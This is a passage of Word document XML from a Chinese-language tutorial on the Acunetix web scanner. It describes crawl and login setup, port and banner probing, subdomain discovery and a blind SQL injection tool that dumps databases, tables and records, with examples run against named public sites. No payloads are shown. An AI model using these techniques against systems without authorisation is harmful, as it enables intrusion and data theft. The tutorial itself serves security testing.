    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Define a file to be imported by crasler at start:自定义从哪里开始扫描，导入txt文件，例如扫描</w:t>
      </w:r>
      <w:hyperlink r:id="rId225" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003E6996">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://www.baidu.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不想从根路径开始扫，而从二级目录</w:t>
      </w:r>
      <w:hyperlink r:id="rId226" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003E6996">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://www.baidu.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/test/，将其保存到txt文件中之后将从test二级目录开始扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use external testing tools during crasl：爬行的时候使用外部测试工具，蜘蛛爬行的过程中将运行您设置的命令，以及超时时间设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Selenium script：设置包含一个火狐扩展插件Selenium IDE生成的HTML文件，蜘蛛爬行的过程中将会根据它来进行爬行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1.4 Target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置完成后会扫描服务器信息，内容有目标的根路径、服务的banner、目标URL、目标操作系统、目标的Web容器、目标的程序语言。如果信息不对，可以手动调整。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D4BA99" wp14:editId="7A073634">
            <wp:extent cx="5905500" cy="4708318"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101" name="图片 101" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\L3X)058[A1L@C41KOJUAX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hang\Documents\Tencent Files\813940732\Image\C2C\L3X)058[A1L@C41KOJUAX0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05500" cy="4708318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1.5 Login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置登录web的用户名和密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用预先设置的登录序列，可以直接加载lsr文件，也可以点击白色处开始按照步骤新建一个登录序列，或者填写用户名密码，尝试自动登录。在某些情况下，可以自动识别网站的验证。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B752B2" wp14:editId="70EC160E">
            <wp:extent cx="5274310" cy="3826614"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="102" name="图片 102" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\X5J@11]DU1(ZH0K41RSUG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hang\Documents\Tencent Files\813940732\Image\C2C\X5J@11]DU1(ZH0K41RSUGFY.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826614"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1.6 Finish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C171B6A" wp14:editId="0D837386">
            <wp:extent cx="6129580" cy="4800600"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="103" name="图片 103" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\Z{O2L}3]FCDP{~G2Y4TW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hang\Documents\Tencent Files\813940732\Image\C2C\Z{O2L}3]FCDP{~G2Y4TWL(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9580" cy="4800600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AcuSensor setup：使用AcuSensor传感技术的设置.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Case insensitive server：爬行与扫描中是否区分大小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Save customized scan settings：将这次的设置保存为一个策略，以便下次直接</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用策略 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击finish按钮开始扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，扫描得到的结果如下图所示，会显示被扫描的系统有哪些漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06F39022" wp14:editId="48ED2186">
            <wp:extent cx="5300345" cy="3297882"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104" name="图片 104" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\CMVJW0U@{BU}9@R(Q0PXO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hang\Documents\Tencent Files\813940732\Image\C2C\CMVJW0U@{BU}9@R(Q0PXOIU.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20482" cy="3310411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc499884706"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>site crawler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ite crawler可爬行网站所有URL，了解网站基本目录结构，以便于进行下一步的扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在start url处填上要爬行的url，点击start开始爬行。下图为爬取</w:t>
      </w:r>
      <w:hyperlink r:id="rId231" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>www.hillstonenet.com.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C2BDBDC" wp14:editId="499E5A04">
            <wp:extent cx="6019800" cy="3951667"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105" name="图片 105" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\IL(J@BZFE{G}3ZN75W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hang\Documents\Tencent Files\813940732\Image\C2C\IL(J@BZFE{G}3ZN75WADO$5.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0657" cy="3958794"/>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pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="31" w:name="_Toc499884707"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target finder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对端口（默认80、443）、web服务器banner信息进行探测。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先探测指定IP/IP段开放特定端口的IP；探测出IP后，探测该端口的banner信息，可探测出该端口上运行的WEB服务的中间件的版本信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在IP Range后输入IP或IP段，点击Start开始扫描。下图是对10.180.185.1-250的扫描结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF03626" wp14:editId="4C5A42D2">
            <wp:extent cx="6019800" cy="1170017"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117" name="图片 117" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\[XM%[XTEJLX59W{L~YYJX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hang\Documents\Tencent Files\813940732\Image\C2C\[XM%[XTEJLX59W{L~YYJX2B.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27776" cy="1171567"/>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pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="_Toc499884708"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Subdomain Scanner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Subdomain Scanner主要用来探测并猜解子域名的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Domain后填上要扫描的域名，选择Use DNS Server from target(使用目标的DNS服务器探测解析)或Use Specified DNS Server（使用自定义的DNS服务器，在旁边可以填写自定义的DNS服务器），点击Start开始扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图是对weibo.com的探测结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC24529" wp14:editId="60E40BB0">
            <wp:extent cx="6116350" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121" name="图片 121" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\{@ZOC]QCZUB4%2}NI)B0)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hang\Documents\Tencent Files\813940732\Image\C2C\{@ZOC]QCZUB4%2}NI)B0)SY.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9179" cy="2639646"/>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pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc499884709"/>
      <w:r w:rsidRPr="003E6996">
        <w:t>Blind SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描网站的时候，发现网站存在SQL盲注漏洞，你可以导入到SQL盲注工具中，你也可以直接将抓取的SQL盲注HTTP数据包粘贴到SQL盲注工具中进行注入测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A137F4" wp14:editId="6EEC5D63">
            <wp:extent cx="4667250" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="图片 122" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\9)8U238O04Y~8FL2@)JE0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hang\Documents\Tencent Files\813940732\Image\C2C\9)8U238O04Y~8FL2@)JE0J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7250" cy="3295650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左下方显示当前的数据库的名字、用户名、版本，以及可列出数据库、表、字段、数据记录 ，如下图右击一个数据库可以获取表、右击表可以获取字段、右击表可以获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC77F52" wp14:editId="0C6C5D69">
            <wp:extent cx="6325695" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123" name="图片 123" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\}YPI8KNF01Q52W7U7JT7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YPI8KNF01Q52W7U7JT72$H.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28907" cy="3592748"/>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pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="34" w:name="_Toc499884710"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:t>Edito</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:t>Edito</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r包含两种模式，一种Request、一种Text Only模式，主要用于编辑HTTP信息，修改HTTP信息并发送给服务器获取返回的结果，是HTTP信息的重放过程。可修改HTTP的头部数据或者其它信息再提交给服务器处理等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击Start按钮，将当前编辑的HTTP请求提交给服务器处理，并获取返回结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344838EC" wp14:editId="51BC7CEA">
            <wp:extent cx="6343049" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="124" name="图片 124" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\W]@6T7@$0QCM%TRTD}$N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hang\Documents\Tencent Files\813940732\Image\C2C\W]@6T7@$0QCM%TRTD}$NG3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49790" cy="3060774"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47110C47" wp14:editId="7410CF84">
            <wp:extent cx="6300318" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="125" name="图片 125" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\EY(18(6[3~9KY]FHAI9$V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hang\Documents\Tencent Files\813940732\Image\C2C\EY(18(6[3~9KY]FHAI9$VL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04095" cy="3183257"/>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pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="35" w:name="_Toc499884711"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Sniffer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Sniffer可以拦截浏览器的数据包信息，并且可以将数据包发送到HTTP Edit编辑重放或者其它功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将浏览器的代理设置为127.0.0.1:8080（默认），在Application Settings——HTTP Sniffer可以修改监听的端口和接收的请求范围。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击Start开始抓包，点击Stop停止抓包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43F5DEFC" wp14:editId="4A782FE7">
            <wp:extent cx="6295613" cy="4286250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
